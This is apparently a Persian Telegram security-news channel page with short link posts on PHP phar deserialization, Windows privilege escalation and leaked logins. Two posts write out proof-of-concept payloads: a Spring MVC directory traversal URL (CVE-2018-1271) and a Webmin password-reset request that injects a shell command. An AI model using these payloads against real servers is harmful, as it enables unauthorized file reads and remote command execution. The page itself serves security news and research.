امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
شرح آسیب پذیری deserialization در phar


https://paper.seebug.org/988/



#php
#poi
#exploit
#writeup


@sec_nerd
[PoC] Analysis of Spring MVC Directory Traversal Vulnerability (CVE-2018-1271)

https://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini

(link: https://paper.seebug.org/991/) paper.seebug.org/991/


#exploit
#Poc


@sec_nerd
"Webmin 0day remote code execution"


PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id


https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html



#webmin
#exploit
#rce


@sec_nerd
راهکارهای جایگزین برای دستیابی به سطح دسترسی SYSTEM در ویندوز


https://blog.xpnsec.com/becoming-system/


#windows
#privesc
#pentest


@sec_nerd
نتایج یک مطالعه در گوگل نشان میدهد 1.5 درصد لاگین های انجام شده در فضای وب در معرض خطر انتشار در حملات هکرها هستند.
این تحقیق نشان میدهد بیشترین خطر متوجه وبسایتهای تجاری، سرویس های ایمیل و پیام رسان و شبکه های اجتماعی می باشد.


https://www.bleepingcomputer.com/news/security/google-estimates-15-percent-of-web-logins-exposed-in-data-breaches/


#google
#news
#privacy


@sec_nerd